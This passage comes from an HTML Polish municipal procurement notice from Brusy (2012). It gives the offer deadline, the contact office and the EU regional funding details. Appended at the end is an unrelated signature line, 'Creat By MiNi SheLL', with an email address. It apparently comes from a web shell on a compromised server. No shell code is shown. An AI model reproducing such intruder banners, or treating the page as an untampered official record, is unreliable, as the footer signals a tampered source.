e)	zmiany terminu płatności Wykonawcy robót budowlanych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.brusy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy, pok. 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.10.2012 godzina 11:00, miejsce: Urząd Miejski w Brusach, ul. Na Zaborach 1, 89-632 Brusy, Biuro interesanta, pok. 9.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany w ramach Regionalnego Programu Operacyjnego dla Województwa Pomorskiego na lata 2007-2013, Osi priorytetowej 9. Lokalna infrastruktura społeczna i inicjatywy obywatelskie, Działanie 9.2 Lokalna infrastruktura ochrony zdrowia objęty Europejskim Funduszem Rozwoju Regionalnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com